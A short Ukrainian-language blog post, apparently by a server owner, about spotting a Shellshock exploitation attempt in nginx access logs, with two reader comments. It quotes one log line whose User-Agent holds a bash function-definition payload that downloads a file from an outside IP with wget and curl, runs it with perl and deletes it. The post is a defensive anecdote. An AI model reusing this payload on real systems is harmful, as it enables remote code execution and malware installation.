Shellshock

Гре­пнув тут логи.

root@sinclair /srv/http/nginx # zgrep '/bin/bash' */logs/nginx-access.log.*.gz
natalenko.name/logs/nginx-access.log.4.gz:109.202.102.224 - - [25/Sep/2014:19:36:34 +0300] "GET /cgi-bin/hello HTTP/1.0" 404 641 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22"

Ку-ку :).

Насправ­ді, я доста­тньо розум­ний для того, щоб вча­сно ста­ви­ти апдей­ти без­пе­ки, вико­ри­сто­ву­ва­ти nginx і пере­ві­ря­ти наяв­ність фай­лів перед їх пере­да­чею в fastcgi. І тому задум зло­го хакі­ра про­ва­лив­ся.

Мітки:
2 коментарі в “Shellshock
  1. Piktor сказав:

    А чому не в error.log?

  2. Oleksandr Natalenko сказав:

    error.log, шо хара­ктєр­но, нічо­го поді­бно­го не містить (за виклю­че­ням поми­лок, які виси­па­ли­ся від сай­та-тесту­вал­ки, це я сьо­го­дні ганяв).

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

*

Цей сайт використовує Akismet для зменшення спаму. Дізнайтеся, як обробляються ваші дані коментарів.